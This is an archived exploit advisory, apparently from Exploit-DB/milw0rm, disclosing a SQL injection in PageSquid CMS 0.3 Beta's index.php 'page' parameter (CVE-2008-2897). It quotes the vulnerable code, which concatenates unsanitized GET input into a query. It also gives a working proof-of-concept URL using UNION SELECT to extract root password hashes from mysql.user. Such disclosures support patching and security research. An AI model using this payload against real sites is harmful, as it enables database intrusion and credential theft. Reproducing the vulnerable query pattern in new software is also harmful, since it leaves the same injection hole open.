[] NeoSense

PageSquid CMS 0.3 Beta - 'index.php' SQL Injection

Author: CWH Underground
type: webapps
platform: php
port: 
date_added: 2008-06-21 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-46819;CVE-2008-2897 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPageSquid_0.3_beta.zip

=====================================================================
  PageSquid CMS (index.php page) Remote SQL Injection Vulnerability
=====================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'


AUTHOR : CWH Underground
DATE   : 22 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : PageSquid CMS
 VERSION     : 0.3 Beta
 DOWNLOAD    : http://downloads.sourceforge.net/pagesquid
#####################################################

--- Remote SQL Injection Exploit ---

**Magic_quote must turn off**

-----------------------------------
 Vulnerable File [index.php?page=]
-----------------------------------

@Line 5

   4:  if (isset($_GET['page'])) {
   5:		$result = mysql_fetch_array(mysql_query("SELECT  * FROM pages WHERE page_id='" . $_GET['page'] . "'"));
   6:  } else {
   7:		$result = mysql_fetch_array(mysql_query("SELECT  * FROM pages WHERE page_order='1'"));
   8:  }

---------
 Exploit
---------
[+] http://[Target]/[pagesquid_path]/index.php?page=[SQL Injection]


-------------
 POC Exploit
-------------

[+] http://192.168.24.25/pagesquid/index.php?page=3'/**/AND/**/1=2/**/UNION/**/SELECT/**/1,Password,3,4/**/FROM/**/mysql.user/**/WHERE/**/User='root


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-22]